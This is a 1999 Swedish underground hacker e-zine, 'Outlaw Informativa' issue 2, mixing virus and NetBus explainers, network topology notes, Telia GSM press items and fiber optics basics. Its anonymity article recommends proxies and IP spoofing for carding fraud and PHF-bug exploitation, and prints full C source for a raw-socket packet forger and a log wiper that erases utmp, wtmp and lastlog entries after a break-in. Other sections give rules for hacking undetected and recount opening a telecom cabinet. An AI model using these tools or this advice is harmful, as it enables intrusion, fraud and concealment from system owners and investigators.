OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
16:51 1999-02-12 Heretics Inc. Presenterar... O U T L A W I N F O R M A T I V A issue #2 Sysslar Judar med Carding ? ___ ( )________________________ ¦ ¦ \ [¯¯¯¯] ¦01 ¦ Disclaimer ¦ ¦ H ¦ #Phreak.se ¦02 ¦ Ledare ¦ ¦ e ¦ ¦03 ¦ Medverkande ¦ ¦ r ¦ #Phreakers ¦04 ¦ Kommande Projekt ¦__¦ e ¦ ¦ ¦-------------------------¦ t ¦ #Programming.se ¦05 ¦ En flaska Virus ¦ i ¦ ¦06 ¦ Nätverkstopologier ¦¯¯¦ c ¦ #PhreakCity ¦06 ¦ Dom gyllene reglerna ¦ ¦ s ¦ ¦07 ¦ Annonymitet vid brott ¦ ¦ ¦ #Trada ¦ ¦-------------------------¦ ¦ I ¦ ¦08 ¦ C-Skåp med 5 fingrar ¦ ¦ n ¦ #Swehack ¦09 ¦ Telia med GSM ¦ ¦ c ¦ ¦10 ¦ Säkerhetsbrister i GSM ¦ [____] ¦11 ¦ Fiberoptik för Newbies ¦ ¦12 ¦ Hemliga frekvenser ¦ ¦13 ¦ Svensk Beige Boxing ¦ ¦ ¦-------------------------¦ ¦14 ¦ Programstrukturer ¦ ¦ ¦-------------------------¦ ¦15 ¦ Ett par IRCnet kanaler ¦ ¦16 ¦ Köpes och Säljes ¦ ¦17 ¦ Frågor och kanske svar ¦ ¦18 ¦ Copyright ¦ ¦19 ¦ Prenumeration ¦ (___)·························· www.heretics.freeservers.com o----------------------------------------------------------------------o ¦[01] Disclaimer knash ¦ o----------------------------------------------------------------------o Denna information är endast skriven som underhållning och informations syfte. Denna information kan vara olaglig så vi tar inget ansvar för dina handlingar med denna information. ____________________________OBS!__________________________ Det är absolut förbjudet för alla myndighetspersoner och personer utsedda av dessa att läsa detta e-zine utan min skriftliga tillåtelse eller order om husrannsakan. Överträdelse leder till att all information publicerad här kommer att underkännas som bevisföring i svensk domstol enligt Svea Rikes Lag. När jag bryter mot PUL gör jag det i egenskap av journalist el. konstnär, välj själv vilket. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ o----------------------------------------------------------------------o ¦[01] Ledare knash ¦ o----------------------------------------------------------------------o Tjenare, nu ett tag efter 1:a numret så släpps detta nummer, 1:a numret blev stort och det var ju också meningen. OverMarZz joinar gruppen eftersom han är aktiv och kommer att hjälpa till med diverse saker. Nu börjar det sega ner i min programmering igen, jag måste börja satsa på allvar. På senaste tiden har jag privat utbildat mig i Telekommunikation. Men när det blir något lov eller liknande så ska jag bli antisocialist och ta tag i programmeringen. Jag vill ju verkligen lära mig, men det går segt eftersom det är avancerat och inte minst för mig som är 13 år. Folk säger att jag ska börja med Pascal och Vbasic men jag vill syssla med avancerade språk, spelar ingen roll hur avancerat det är, jag kommer att ha mera nytta av C++ i framtiden, både när jag ska söka jobb och i privata projekt som t.ex. socket programmering som är mycket bra i C++. 114 prenumeranter på Outlaw Informativa på inte alls speciellt kort tid, men förhoppningvis kommer dessa att bli flera. o----------------------------------------------------------------------o ¦[02] Medverkande knash ¦ o----------------------------------------------------------------------o ¤ Knash ¤ knash@linux.nu ¤ Founder ¤ OverMarZz_ ¤ mixtile112@hotmail.com ¤ Member ¤ crazy-train (Evil^Phreakz0r) ¤ crazy-train@telia.se ¤ Proud Member =) ¤ Dreamfish ¤ Dark_Side@death-star.com ¤ Member ¤ TheClown ¤ orkar@inte ¤ Inte medlem, bidrog med en artikel. o----------------------------------------------------------------------o ¦[03] Kommande Projekt knash ¦ o----------------------------------------------------------------------o Jag håller på att skriva en textfil om Säkerhet, grundläggande info kommer det då att bli. Jag kommer att ta upp ämnen som Virus, Trojaner , Brandväggar, Kryptering. Om det är någon som har information om Nätverks Säkerhet så skicka det direkt till knash@linux.nu. Jag letar även efter information om Firewalls, alltså hur man ska konfiguera dem och så. ______________________________________________________ {Information wants to be Free, Knowledge is not a Crime} ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ o----------------------------------------------------------------------o ¦[04] En flaska Virus knash ¦ o----------------------------------------------------------------------o Här kommer lite enkel grundläggande information kring Virus även lite information om Trojaner följer. ¤ Skydd mot Virus Det finns olika slags skydd mot Virus, det bästa skyddet är att låta bli att ladda hem filer från opålitliga websidor och alltid kontrollera disketter och andra lagrings diskar. Men det går att andvända mjukvara som söker efter Virus på diskar och i minnet. Själv andvänder jag Dr Solomon's Anti Virus Toolkit som jag tycker fungerar bra, om du köper det så får du en diskett i brevlådan gratis varje gång då Virus databasen uppdateras. Men Dr Solomon's är då inte den enda, McAfee Anti-Virus, eSafe, F-PROT Professional Anti-Virus Toolkit och Panda AntiVirus för att bara nämna några. ¤ Makrovirus Makroviruset kan smitta alla typer av operativ system, viruset sprider sig via Word 6.0 filer. För att skydda sig så kan ett AntiVirus program andvändas, ett tips är att andvända ett nytt AntiVirus program eftersom Makrovirus är en ny typ av Virus. ¤ Partitionssektor Virus Partionsektorn är den första delen som datorn läser när den startar datorn. Partionsektorn är mycket känslig för radering av info eftersom den innehåller information om skivan (såsom antalet sektorer i varje partition och var DOS-partitionen börjar), och ett litet program. När PC:n startar läser den partitionssektorn, laddar programmet till minnet och kör det. Partionsektor virus är som ett Bootsektor virus bara att det är svårare att hitta. Många program som kontrollerar lagrings skivor (t.e.x DEBUG) tillåter inte att kolla på partionsektorn. Disktetter har ingen partionsektor så Partionsektor virus beter sig exakt som ett Bootsektor virus. ¤ Bootsektor Virus Bootsektorn är den första delen på en Diskett och på en hårdisk är den den första delen på DOS-Partionen, den innehåller information om disken eller disketten (såsom t.ex. antalet sektorer i den logiska enheten) När datorn startas läser den Boot-partionen från den disk som angetts i BIOS Setup (A: som standard) om den inte hittar den så läser den nästa disk (C: som standard) när den hittar ett program så laddar den det i minnet och kör igång det. Ett Bootsektor virur fungerar på så sätt att den ersätter Bootsektorn med sin egen kod och flyttar sen den gamla Bootsektorn någon annanstanns. När viruset lagt sig bekvämt i Bootsektorn så startar det varje gång datorn startar. Dom flesta Bootsektor virus infekterar bara disketter men det finns även dom som infekterar hårdiskar. Master Boot Record är ett exempel på ett Virus som infekterar hårdiskar och AntiExe är ett exempel på ett Bootsektor Virus som infekterar disketter. ¤ Överskrivande Virus Gör precis som titeln säger skriver över filer så som systemfiler och befintliga filer i systemet. Överskrivande Virus sprider sig inte så snabbt eftersom dom lätt kan upptäckas. HLLO är en familj med överskrivande i virus och alla är skrivna i högnivåspråk. ¤ Kombinationsvirus Är ett Virus som andvänder sig mera än 1 för att sprida sig och infektera körbara filer, bootsektorn och partionsektorn. Som normalt kan detta virus inte föröka sig i Windows 95. ¤ Droppers En Dropper är egentligen inte ett virus utan den får dig tro göra något medans den gör något annat, i vanliga fall installerar ett Virus medans den visar upp ett flashigt demo. theipspoof.zip på 310229 bytes som innehåller 2 filer, Spoof.dmo på 124928 bytes och IPSpoof.exe på 64000 bytes. Vem vill inte vara anonym ? Denna IP Spoofer i själva fallet en Back Orifice trojan. Det står på många underground relaterade sidor att detta är den bästa IP Spoofern på marknanden. ¤ Worm Ett virus som kopierar sig själv, behöver inte nödvändigtvis vara ett Virus. Worms och Virus brukar ofta kombineras. The Morris Worm som höll på att sänka hela Internet, eller på den tiden ARPANET som det hette. The Morris Worm var skriven av Robert T. Morris som studerade på Cornell University. Wormen skapade en anslutning till en dator och kopierade sig själv till den kommande dator för att sedan sprida sig vidare. Det finns mycket inforamtion om "The Morris Worm" det är bara söka efter det om du tycker att denna information inte räckte till. ¤ Netbus Netbus är en trojan som är precis som på namnet en Nät Buss. Netbus består av en server och en klient. Namn: Storlek: Status: Path.exe 472 576 bytes Server NetBus.exe 567 296 bytes Klient NetBus.rtf 24 113 Dokumenation Path.exe Kan döpas om till vilket namn som helst. Ikonen är en blå ring med en brinnande grå fackla på. Servern lägger sig i Registret (User.dat och System.dat) Registret kan hanteras med C:\Windows\regedit.exe. När servern är installerad så ligger den i... HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \run innehåller sträng värden för program som automatiskt ska startas när datorn startas. För att ta bort server (eller patchen) så går det ner i dos läge, alltså Start/Avlsuta/Starta om datorn i MS-DOS läge. du handlar antagligen i C:\Windows när datorn ligger i DOS läge så därför skriver du följande. Microsoft(R) Windows 95 (C)Copyright Microsoft Corp 1981-1996. C:\WINDOWS>rm patch.exe Detta beror självklart på serverns namn. För att leta efter server så trycker du på Start/Sök/Filer eller mappar/ sen trycker du på Bläddra och väljer C:\Windows. Skriv sedan in *.*exe i Namn fältet. Det kommer följas av en massa program listas och nu är det bara leta efter servern. Det du ska kolla efter är ikonen som beskrivs ovan. Ett annat tips om du enbart vill skydda dig är att sätta kontroll för på porten som Netbus andvänder. Den porten Netbus andvänder är 12345 och kan blockeras med Nuke Nabber2.x. Du börjar med att klicka dig fram till File/Options/Advanced. Klick a på "unassigned" och vid "Port to monitor" skriver du in "12345" som är den porten Netbus andvänder och vid "Protocol" väljer du "tcp" Det kommer att se ut så här om någon ansluter... [02/05/1999 17:19:47.340 GMT+0100] Connection: localhost.swip.net (127. 0.0.1) on port 12345 (tcp). [02/05/1999 17:19:55.680 GMT+0100] Disconnect: localhost.swip.net (127. 0.0.1) on port 12345 (tcp). Lägg märke till att jag andvänd radbryte ovan ! Jag har läst att man kan ta bort Netbus genom att ta bort nyckeln /nomsg i registret. Jag antar att du endast behöver söka efter den, alltså Redigera/Sök Om du vill veta om du har Netbus över huvudtaget så kan du andvända telnet för att ansluta till just den porten som andvänds. Parametrarna är enkla, tryck Start/Kör och skriv sedan in "telnet localhost 12345" Du kan även skriva "telnet 127.0.0.1 det är samma som localhost. Localhost menas alltså den lokala dator (den datorn du andvänder) Nu har jag gjort en idiot förklaring till hur man blir av med Netbus, så nu borde alla fatta. Den bestä säkerheten är ändå att aldrig ta emot filer som du inte vet vad dom innehåller. Du ska inte heller lita på någon om han/hon säger att det är ett demo eller spel. ¤ Netbuster Netbuster är som på namnet ett program som stoppar andvändare och är programmerat av Håkan Bergström. Vilka funktioner har Netbuster då ? Netbuster kan scanna registrets autostart och även i minnet efter Netbus servern och som du vet så kan man med Netbus visa bilder, spela upp ljud och ladda hem/upp filer på hårdisken. Vid fliken Files finns det lite inställningar så du kan visa saker som egentligen inte finns. Om en andvändare skulle ansluta till din dator med Netbus, så kan han ta en Skärmdump mycket enkelt, i Netbuster kan du istället göra så en annan bild visas upp. Om någon skulle skicka ett message så kan du istället stället ställa in så Netbuster skickar ett message till andvändaren, inställningar sker under fliken Messages. Under fliken Logfile visas logg filen. I logg filen så finner du all information vem som anslutit till din dator och när personen ansluter. o----------------------------------------------------------------------o ¦[05] Nätverkstopologier crazy-train ¦ o----------------------------------------------------------------------o Med nätverkstopologi menas det geometriska utseende som utgörs av nätets media, enheter och noder. De vanligaste topologierna är: ¤ BUS-nät ¤ Stjärnnät ¤ Ringnät ¤ Slingnät o BUS-Nät BUS tekniken är ett utvecklingssteg från datorernas överförings-BUS som "adopterats" av LAN-tekniken. I datorerna sker överföring av information med parallell-BUS, dvs alla bit i den operationen eller det ASCII-tecken som skall transporteras tillsammans med kontroll informationen, sker i ett "svep". I ett LAN kan ej denna teknik användas, informationen sänds istället seriellt med hög hastighet. I ett BUS-nät är samtliga noder anslutna till en gemensam kabel, den sk transmissions-BUS. Det förekommer två tekniker, basband och bredband. Signifikant för BUS-nätet är att det meddelande som sändande nod ger upphov till, samtidigt mottages av alla övriga noder. Endast den utrustning som meddelandet är destinerat till, känner igen adressen och tar emot meddelandet. Metodiken är analog med ett POLL-SELECT system där värddatorn i tur och ordning POLLAR anslutna terminaler och styrenheter (CLUSTER). BUS-topologin kallas också för trädtopologi. o Stjärnnät I ett stjärnnät har varje ansluten nod sin unika förbindelse till en för alla övriga noder och förbindelser gemensam central nod. Ett representa- tivt exempel på stjärnnät, är de abbonentväxlar som överför både data och talkommunikation (PRIVATE AUTOMATIX BRANSCH EXCHANGE - PABX). I den generation abbonentväxlar som är tillgänglig i Sverige, används digital programmeringsstyrd teknik. Detta har gjort det möjligt att även använda växlarna för dataöverföring. I abbonentledningens termineringspunkt finns det en speciell telefonutrustning, till vilken en terminal med standardiserat gränssnitt kan kopplas in. I PABX:erna finns det en utrustning sin separerar data och tal. Oberoende av varandra kan tal och data fördmedlas på samma trådpar. Räckvidden för lokalabonnentledning är c:a 1-2 Km vilket gör att nätet kan ha sin spridning inom en viss radie. Genom utrbrutna väljarsteg som lokaliseras på andra platser, kan PABX nätet ökas i räckvidd och omfattning. För extern datatrafik förses PABX:en med en gemensam resurs som består med ett antal modem i en POOL för trafik på det allmänna telenätet (internet). o Ringnät Vid ett ringnät är varje nod ansluten till en långserie av sammankopplade punkt-till-punkt förbindelser. Varje nod är förbunden med närmast förgående och efterföljande nod. Datatrafiken cirkulerar runt i ringen från nod till nod där signaöen regenereras och förstärks innan den sänds vidare. Fördröjningen inom varje nod blir mycket kort, endast några få bit då ej hela meddelandet buffras i noderna. När ett meddelande nåt adressatnod och har godkänts, plockas det bort ur den ändlösa dataströmmen. Överföringshastigheterna på mediat ligger inom intervallet 1-10 Mbit/s. De vanligaste accessmetoderna i ett ringnät är: *Token Passing *Slotted Ring *Empty Slot. *Register Insert. En huvudnod på ringen kontrollerar och övervakar trafiken och kan ingripa vid felsituationer. Nackdelen med ett ringnät är att ett avbrott på förbindelsen försätter hela nätet ur funktion. För att säkerställa detta, är ringnäten i bland konstruerade med dubbla ringar, Med ett dubbelt ringnät kan man också klara montering av nya noder i "flykten" trots att datatrafik pågår. Aktiva komponenter ingår i noderna och om en nod slutar att fungera, kan också nätet försättas ur funktion. För att förebygga datta är noderna vid f eltilfällen och nätspänningsfrånfall. o Slingnät Ett slingnät kan liknas vid en enkelspårig järnvägslinje där data trans- porteras mellan stationer och linjens ändhållplatser. En markant skillnad mellan sling och ringnät, är slingnätets centrala nod som styr och övervakar trafiken. Möjligheten till direkttrafik mellan övriga noder finns ej. ÖVERFÖRINGSMEDIA. Mediat är bäraren av all information i ett datanät. Det finns ett flertal att upprätta ett LAN. *Tvinnade par (Twisted pair) *Flatkabel *Fiberoptik *Koaxialkabel - Enkabel - Tvåkabel *Infraröd överföring *Radioöverföring - mikrovåg - radiolänk - satellit o----------------------------------------------------------------------o ¦[06] Dom gyllene reglerna (inom hacking Dreamfish ¦ o----------------------------------------------------------------------o Så vitt som jag har förstått så är en majoritet av våra kära läsare intresserade av datorer (Bra att jag har förstått) och oxå intresserade av att kunna bryta sig in i andras datasystem ...Men vad är det om man inte vet dom oskrivna reglerna. Om du är väl införstådd inom ämnet hacking ,så sluta läs nu och hoppa över till nästa artikel. Det här är för dom på inlärningsstadiet. Nåväl här börjar vi....... 1. Skada aldrig ett system . Varför ?: Jo först och främst så klassas du inte längre som en hacker vi har nu bytt till det inte lika glamourösa cracker. Vad mer ,jo den som har blivit crackad känner ett större behag att hämnas. 2. Ändra inte i andras systemfiler ,förutom dom som kan påvisa att dom befunnit dig i Han/Hon/Deras dator och dom som kan ge dig fortsatt access. Varför?: Ändra inte kopiera istället ,för ändringar behövs inte om du inte känner för att lämna lockbete efter dig själv. 3. Dela inte information om dina projekt med sådana du inte kan lite fullt ut på . Varför?: Har du aldrig blivit tillfrågad att utge någons namn för att det är bäst för den själv. Dom man känner har alltid ett hopp på en varesig man skall bättra sig eller göra ett bättre hack nästa gång. 4. När du "sätter en lapp på anslagstavlan" (BBS = Bulletin Board Systems) Var så försiktig som möjlig med dina beskrivningar om vad du gjort som möjligt. V?: BBS kan avlyssnas ...Om du inte visste det redan (Reds.amm). 5. Använd ALDRIG ditt riktiga namn eller telenr när du chattar på Irc/Icq . V?: Kan du inte lista ut det själv. =) 6. Lämna aldrig ditt underskrift/Tag eller dylikt när du hackar. V?: Vi vet hur det gick för tjuven i Rosa Pantern filmerna .. 7. Hacka dig aldrig in i statsägda datorer. V:? Staten har den grymmaste datastyrkan i landet , din dator är nada mot deras. o----------------------------------------------------------------------o ¦[07] Annonymitet vid datorbrott OverMarZz ¦ o----------------------------------------------------------------------o Rapport klar: 04:36 9 february 1999 overmarzz@level8.com Http://www.level8.com Introduktion: Anledningen till att jag fick ett flipp och började på denna filen är enkel, dom flesta lamers, newbies och wannabies använder program som "Win spoof" med mera när dom vill vara anonyma, Men de flesta av de programmen funkar inte. Och när dom loggar in som anonymos login tror dom att dom verkligen är anonyma. Det finns många sätt att vara annonym på, jag har skrivit några grunder här men om man är proffs inom tcp/ip så skrattar man nog en bra stund åt denna texten. Jag frånsäger mig inte något som helst ansvar för att meningen är att inget ska hända därmed inget ansvar. 1) Ip spoofing 1.1 Dölj din ip genom en proxy server 1.2 Shell kod till en ip spoofer för linux o----------------------------------------------------------------------o (1) Ip spoofing Detta är bra vid bedrägeri på hemsidor såväl vid "Carding" som vid utnyttjande av exp PHF buggen. 1.1 Via en Proxy Gå in i Ms-dos prompten och skriv ping proxy.algonet.se om du då får medelandet 'bad IP' eller nåt i den stilen så menas det att det helt enkelt inte finns nån proxy där, men om du får ett icmp echo så finns det en. Hotmail och aol har sådana som är användar vänliga, försök på dom. Omdu kör linux så antar jag var du använder kommandot 'ping'. I Netscape, tryck på Options|Network Preferences (förutsatt att du har En engelsk version) klicka sen på Proxy fliken och kolla radio button 'Manual Proxy config' och tryck sen 'view'. Ställ nu in det för det protocollet du vill använda, (vissa Proxies använder bara HTTP) oftast finns där att välja mellan FTP och HTTP. Den vanligaste porten som proxies använder är 8080 men inte nödvändigtvis I Internet Explorer, tryck på View|Options| Tryck sen 'Connection' fliken och sätt upp det som i netscape. Nu kommer inte din Ip adress visas i Guestbooks, counterlogs, ftp och http. Du kan maila i tex hotmail anonymt nu eller carda nån stans utan bekymmer 1.2 Ip spoofer för linux Denna är skiven i C, för linux. *** #include <sys/types.h> #include <sys/socket.h> #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <netdb.h> unsigned short ip_cksum(unsigned char * buff, int len) { unsigned long sum = 0; if (len > 3) { __asm__("clc\n" "1:\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "loop 1b\n\t" "adcl $0, %%ebx\n\t" "movl %%ebx, %%eax\n\t" "shrl $16, %%eax\n\t" "addw %%ax, %%bx\n\t" "adcw $0, %%bx" : "=b" (sum) , "=S" (buff) : "0" (sum), "c" (len >> 2) ,"1" (buff) : "ax", "cx", "si", "bx" ); } if (len & 2) { __asm__("lodsw\n\t" "addw %%ax, %%bx\n\t" "adcw $0, %%bx" : "=b" (sum), "=S" (buff) : "0" (sum), "1" (buff) : "bx", "ax", "si"); } if (len & 1) { __asm__("lodsb\n\t" "movb $0, %%ah\n\t" "addw %%ax, %%bx\n\t" "adcw $0, %%bx" : "=b" (sum), "=S" (buff) : "0" (sum), "1" (buff) : "bx", "ax", "si"); } sum =~sum; return(sum & 0xffff); } unsigned short tcp_check(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr) { unsigned long sum; __asm__(" addl %%ecx, %%ebx adcl %%edx, %%ebx adcl $0, %%ebx " : "=b"(sum) : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256) : "bx", "cx", "dx" ); __asm__(" movl %%ecx, %%edx cld cmpl $32, %%ecx jb 2f shrl $5, %%ecx clc 1: lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx loop 1b adcl $0, %%ebx movl %%edx, %%ecx 2: andl $28, %%ecx je 4f shrl $2, %%ecx clc 3: lodsl adcl %%eax, %%ebx loop 3b adcl $0, %%ebx 4: movl $0, %%eax testw $2, %%dx je 5f lodsw addl %%eax, %%ebx adcl $0, %%ebx movw $0, %%ax 5: test $1, %%edx je 6f lodsb addl %%eax, %%ebx adcl $0, %%ebx 6: movl %%ebx, %%eax shrl $16, %%eax addw %%ax, %%bx adcw $0, %%bx " : "=b"(sum) : "0"(sum), "c"(len), "S"(th) : "ax", "bx", "cx", "dx", "si" ); /* We only want the bottom 16 bits, but we never cleared the top 16. */ return((~sum) & 0xffff); } void resolve_address(struct sockaddr *addr, char *hostname, u_short port) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)addr; (void) bzero((char *)address, sizeof(struct sockaddr_in)); address->sin_family = AF_INET; address->sin_port = htons(port); address->sin_addr.s_addr = inet_addr(hostname); if ((int)address->sin_addr.s_addr == -1) { host = gethostbyname(hostname); if (host) { bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { puts("Couldn't resolve address!!!"); exit(-1); } } } char *create_ip(u_long source, u_long dest, u_char protocol, u_char ttl, u_short id, char *data, int data_len) { char *ip_datagram; struct iphdr *ip_header; ip_datagram = malloc(sizeof(struct iphdr) + data_len); ip_header = ip_datagram; ip_header->version = 4; ip_header->tos = 0; ip_header->frag_off = 0; ip_header->check = 0; ip_header->saddr = source; ip_header->daddr = dest; ip_header->protocol = protocol; ip_header->ttl = ttl; ip_header->id = htons(id); ip_header->ihl = 5; ip_header->tot_len = htons(sizeof(struct iphdr) + data_len); ip_header->check = htons(ip_cksum(ip_datagram,sizeof(struct iphdr))); bcopy(data,ip_datagram+sizeof(struct iphdr),data_len); return ip_datagram; } char *create_tcp(u_long source, u_long dest, u_short sport, u_short dport, u_long seqnum, u_long acknum, u_char flags, char *data, int datalen) { char *wewt; struct tcphdr *tcp_header; wewt = malloc(sizeof(struct tcphdr) + datalen); tcp_header = wewt; tcp_header->th_sport = sport; tcp_header->th_dport = dport; tcp_header->th_seq = seqnum; tcp_header->th_ack = acknum; tcp_header->th_flags = flags; tcp_header->th_sum = 0; tcp_header->th_sum = htons(tcp_check(tcp_header, sizeof(struct tcphdr), source, dest)); bcopy(data,wewt+sizeof(struct tcphdr),datalen); return wewt; } void sendpack(char *fromhost, int fromport, char *tohost, int toport) { char *packet; char *tcppacket; char *sendme; static struct sockaddr_in local, remote; static int sock = 0; if (!sock) { resolve_address((struct sockaddr *)&local, fromhost, fromport); resolve_address((struct sockaddr *)&remote, tohost, toport); sock = socket(AF_INET, SOCK_RAW, 255); if (sock == -1) { perror("Getting raw socket"); exit(-1); } } tcppacket = create_tcp(&local.sin_addr, &remote.sin_addr, local.sin_port, remote.sin_port, 795930600, 0, TH_SYN, NULL, 0); packet = create_ip(&local.sin_addr, &remote.sin_addr, 6, 24, 4, NULL, 0); sendme = (struct iphdr *)packet; bcopy(tcppacket, sendme+sizeof(struct iphdr), sizeof(tcppacket)); printf("the ip header is %d bytes long.\n", sizeof(struct iphdr)); printf("the tcp header is %d bytes long.\n", sizeof(struct tcphdr)); printf("the ip packet is %d bytes long.\n", sizeof(packet)); printf("the tcp packet is %d bytes long.\n", sizeof(tcppacket)); printf("the final packet is %d bytes long.\n", sizeof(sendme)); { int result; result = sendto(sock, packet, sizeof(packet), 0, (struct sockaddr *)&remote, sizeof(remote)); if (result != sizeof(packet)) { perror("sending packet"); } } } main(int argc, char **argv) { if (argc!=5) { printf("usage: %s <from host> <from port> <to host> <to port>\n", argv[0]); exit(-1); } printf("forging packet from %s.%d to %s.%d\n", argv[1], atoi(argv[2]), argv[3], atoi(argv[4])); sendpack(argv[1], atoi(argv[2]), argv[3], atoi(argv[4])); } o----------------------------------------------------------------------o (2) Unix loggar Detta är användbart när du brutit dig in i ett Unix system och inte vill bli upptäckt, för när ett företag kommer på ett intrång så ändras lösenord och då blir du tvungen att hacka Unix:en igen men då kan dom ha dragit in ditt andra konto du hadde hos dom Dom huvudsakliga loggarna ligger under: /etc/utmp, /usr/adm/wtmp Och /usr/adm/lastlog . De är inte text philer utan måste öppnas av speciella program. Här nedan är ett program som är användbart för det *** #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } o----------------------------------------------------------------------o ¦[08] C-Skåp med 5 fingrar knash ¦ o----------------------------------------------------------------------o Jag och en skön polare; aemkey drog till någon sunkit disco som någon fritidsgård hade anordnat. Kvällens sommarväder låg på -13º, skummet i ölen hade fryst till en is-sörja. Men inget hindrade 2 Heretics Scouter att dricka för jävlig öl. Nu hade tiden gott och vi hade fått i oss ett par öl och spytt på toan uppe vid macken ett par gånger. Vi stod fortfarnande i det varma vädret och väntade på att solen skulle titta fram, jag vände mig om och gnuggade mig i ögonen och fick syn på ett C-Skåp trodde jag. Jag gick fram för att kolla och det va verkligen ett C-Skåp. Jag stoppade in fingrarna i den lilla glipan som fanns och drog lite och efter ett tags tänkade så kom jag fram till att man kunde dra upp boxen. Så jag hojtade efter aemkey och bad han försöka. Han lydde min uppmaning och drog upp skåpet med inte allt för högt pang, vi kollade efter en massa linor och gamla terminaler. Vi stängde och lämnade boxen eftersom det va ganska mycket folk ute. Allt aemkey gjorde va att stoppa in 5 fingrar som visserligen va frysta och blåa. o----------------------------------------------------------------------o ¦[09] Telia med Gsm crazy-train ¦ o----------------------------------------------------------------------o Telia först i världen med att göra fältförsök i praktiken - Upp till fyra gånger snabbare dataöverföring i GSM. Telia Mobile demonstrerade nyligen HSCSD, High Speed Circuit Switch Data, i praktiken i sitt nätverk. Applikationen har levererats av Ericsson och det var första gången någonsin som HSCSD visades i praktiken. Operatörerna kommer att kunna dra nytta av tjänsten på många sätt och användarna kommer märka att kommunikationen går snabbare när det gäller dataöverföring via GSM. Applikationen gör det möjligt att snabba på datakommunikationens inträde på GSM-näten. I den första fasen kommer HSCSD att tillhandahålla en bithastighet på häpnadsväckande 38.4 kbp/s. För slutanvändaren innebär applikationen att viss informationsöverföring går snabbare, som bäst upp till fyra gånger snabbare. Överföringshastighet och prestanda är grundläggande för leverantörerna. När man läser sin e-post eller söker genom företagets intranet är hastighet och enkelhet avgörande för slutanvändaren. En högre bithastighet betyder fler nöjda abonnenter, utmärkta affärstil- lfällen och en inkörsport till bättre applikationer för datakommunikati- on och nya teknologier som GPRS. Allt detta är viktigt för operatörerna. Genom att erbjuda högre hastighet kan nya typer av trådlösa applikationer, exempelvis fjärrstyrd videoövervakning, utvecklas och befintliga applikationer fungera smidigare vilket resulterar i nöjdare kunder. Källa: www.telia.se o----------------------------------------------------------------------o ¦[10] Säkerhetsbrister i GSM crazy-train ¦ o----------------------------------------------------------------------o Telia kommenterar Säpo - chefen Anders Erikssons uttalande angående säkerheten i GSM. Vid Folk och Försvarskonferensen i Sälen gjorde Säpo-chefen Anders Eriksson i går uttalanden om säkerheten i GSM. "Avslagna mobiltelefoner bör lämnas utanför sammanträdesrum eftersom de kan användas för avlyssning", hävdar Anders Eriksson. Telias kommentar: Om GSM-telefonen som används följer GSM - specifikation, har blivit typtestad av ett certifierat testhus och inte är manipulerad är den inte möjlig att använda för avlyssning. Om mobiltelefonen har blivit manipulerad eller är felaktig kan detta dock vara möjligt. Ansvaret för att se till att mobilerna håller rätt kvalitet, överensstämmer med den typcertifiering som gjorts samt har en konstruktion som motverkar manipulationer ligger på mobiltelefontillver- karen. En normal GSM-telefon går inte att använda för avlyssning. Källa: www.telia.se o----------------------------------------------------------------------o ¦[11] Fiberoptik för Newbies knash ¦ o----------------------------------------------------------------------o Optik kablar andvänds vid tele kommunikation och överföring. Opto kablarna andvänder ljus som informations skickare för en förökad hastighet. För en överföring mellan elektronik till ljus behövs en E/O omvandlare. ________________ E/O Omvandlare ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Sändare Mottagare +----+ Optisk Fiber +----+ | ||¯¯¯¯¯|-----------------|¯¯¯¯¯|| | | ||_____|-----------------|_____|| | +----+ 